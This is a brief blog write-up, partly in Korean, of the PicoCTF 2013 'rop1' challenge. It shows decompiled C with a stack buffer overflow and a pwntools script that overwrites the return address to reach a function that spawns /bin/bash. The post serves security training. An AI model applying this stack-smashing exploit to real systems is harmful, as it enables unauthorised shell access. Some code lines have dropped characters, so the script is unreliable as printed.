Wargame & CTF/PicoCTF 2013

[PicoCTF 2013] rop1

cg10036 2019. 10. 8. 06:14
1
2
3
4
5
6
int __cdecl main(int argc, const char **argv, const char **envp)
{
  be_nice_to_people();
  vulnerable_function();
  return write(1"Hello, World\n", 0xDu);
}
cs


1
2
3
4
5
6
ssize_t vulnerable_function()
{
  char buf; // [esp+10h] [ebp-88h]
 
  return read(0&buf, 0x100u);
}
cs


1
2
3
4
int not_called()
{
  return system("/bin/bash");
}
cs


vulnerable_function에서 buf 오버플로우가 난다. ret을 not_called로 덮어씌우면 된다.


ex.py


1
2
3
4
5
6
7
8
9
10
11
from pwn import *
 
= ELF("./rop1")
= process("./rop1")
 
payload = ""
payload += "A"*(0x88+0x4)
payload += p32(e.symbols["not_called"])
 
p.send(payload)
p.interactive()
cs